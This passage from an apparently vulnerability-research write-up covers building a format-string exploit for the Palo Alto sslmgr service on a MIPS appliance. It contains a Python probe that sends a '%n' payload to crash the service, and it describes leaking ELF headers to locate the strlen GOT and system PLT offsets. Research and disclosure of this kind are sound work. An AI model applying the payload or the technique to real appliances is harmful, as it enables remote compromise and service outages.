Now that we can dump arbitrary memory addresses, we can finally dump the strlen GOT and system PLT addresses we need for the exploit. Easy… except, where are they??? Without the sslmgr binary, how do we know what memory address to start dumping from to find the binary? We have a chicken-or-egg situation here, and the 64-bit address space is pretty big.

Luckily for us, the restricted shell provides one more break: if a critical service like sslmgr crashes, a stack trace and crash dump can be exported using scp. At this point I’ve gotten pretty good at crashing the service, so we’ll just throw some %n format operators at arbitrary indexes.
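Under the same endpoint and parameter assumptions as the earlier sketches, a crash probe is a one-liner; a %n write through an arbitrary stack slot almost always faults the process:

```python
# Sketch: fault sslmgr so the restricted shell will export a crash dump.
import requests

try:
    requests.post("https://gateway.example.com/sslmgr",  # hypothetical target
                  data="scep-profile-name=%21$n",        # illustrative index
                  verify=False, timeout=10)
except requests.exceptions.RequestException:
    pass   # a dropped connection here is usually good news
```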

I learned something new about IDA Pro during this endeavor: you can use it to open ELF core dumps. Opening the segmentation view in IDA, we could finally see where the binary is being loaded in memory. Another interesting detail we noticed while debugging our payloads was that ASLR appeared to be disabled on our physical MIPS device, as the binary and loaded libraries were always loaded at the same addresses.

Finally, let’s start dumping the binary so we can get our offsets. We have roughly 0x40000 bytes to dump at approximately 4 bytes per second. Ummm, that’s going to take… days. If only there were a shortcut. All we really need are the offsets to strlen and system in the GOT and PLT.

Unfortunately, even if we knew exactly where the GOT and PLT were, nothing in the GOT or PLT indicates the function names. How, then, does GDB or IDA Pro resolve the function names? It uses the ELF headers. We should be able to dump the ELF headers and a fraction of the binary to resolve these locations. After an hour or two, I loaded my memory dump into Binary Ninja (IDA Pro refused to load my malformed ELF). Binary Ninja has proven to be invaluable when analyzing and manipulating incomplete or corrupted data.

A little bit of research on ELF reveals that the PT_DYNAMIC program header holds a table pointing to other sections with pertinent information about an executable binary. Three entries are important to us: the Symbol Table (DT_SYMTAB, tag 6), the String Table (DT_STRTAB, tag 5), and the Global Offset Table (DT_PLTGOT, tag 3). The Symbol Table lists the proper order of the functions in the PLT and GOT sections, and each entry provides an offset into the String Table that identifies the function name.

With the offsets to the symbol and string tables, we can properly resolve the function names in the PLT and GOT. I wrote a quick and dirty script to parse through the symbol table dump and output a reordered string table that matches the PLT; a sketch of the idea follows. This probably could have been done using Binary Ninja’s API, but I’m a n00b. With the symbol table matched to the string table, we can now overlay this with the GOT to get the offsets we need for strlen and system. We have two options for dumping the GOT: use the crash dump from earlier, or manually dump the memory using our script.
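A sketch of that matching step, assuming big-endian 64-bit (MIPS) Elf64_Sym entries and that the DT_SYMTAB and DT_STRTAB regions were already dumped to files; the file names are illustrative:

```python
# Sketch: resolve function names by walking the dumped symbol table.
# Elf64_Sym is 24 bytes: st_name(4) st_info(1) st_other(1) st_shndx(2)
#                        st_value(8) st_size(8) -- big-endian on this target.
import struct

symtab = open("symtab.dump", "rb").read()   # bytes leaked from DT_SYMTAB
strtab = open("strtab.dump", "rb").read()   # bytes leaked from DT_STRTAB

def name_at(off: int) -> str:
    return strtab[off:strtab.index(b"\x00", off)].decode(errors="replace")

for i in range(len(symtab) // 24):
    st_name, = struct.unpack_from(">I", symtab, i * 24)
    if st_name:
        # printed in symbol-table order, which mirrors the PLT/GOT layout
        print(i, name_at(st_name))
```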

I decided to go with the crash dump to save a little time. The listing above shows entries in the GOT that point to the PLT (0x1001xxxx addresses) and several library functions that have already been resolved. Combined with our string table, we can finally pull the correct offsets for strlen and system and finalize our POC. Our POC targets the MIPS-based physical Palo Alto appliance, but the scripts should be useful across appliance types with minor tweaking. Wow, all done, easy right?

Important Note

While the sslmgr service has a watchdog monitor to restart the process when it crashes, if it crashes more than ~3 times in a short amount of time, it will not be restarted and will require a manual restart. Something to keep in mind if you are testing your shiny new exploit against a customer’s production appliance.
